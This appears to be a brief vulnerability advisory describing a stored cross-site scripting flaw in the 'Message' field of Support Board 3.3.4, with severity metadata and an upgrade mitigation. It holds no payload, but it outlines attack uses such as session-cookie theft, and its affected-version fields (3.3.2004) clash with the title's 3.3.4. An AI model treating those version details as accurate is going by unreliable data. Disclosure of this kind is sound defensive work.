Vendor: Support Board
By: John Jefferson Li
CVSS: 8.8 HIGH
Stored Cross-Site Scripting (XSS)
CWE: 79
Product Name: Support Board
Affected Version From: 3.3.2004
Affected Version To: 3.3.2004
Patch Exists: YES
Related CWE:
CPE: 2.3:a:support_board:support_board:3.3.4
Platforms Tested: Ubuntu 20.04.2 LTS, Windows 10
2021
Support Board 3.3.4 – ‘Message’ Stored Cross-Site Scripting (XSS)
A stored cross-site scripting (XSS) vulnerability in Support Board 3.3.4 allows an attacker to inject malicious JavaScript code into the 'Message' field of a conversation. This code is then stored in the database and executed when the conversation is viewed by an administrator or other user. The malicious code can be used to steal session cookies, redirect users to malicious websites, or perform other malicious actions.
Mitigation:
The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Support Board.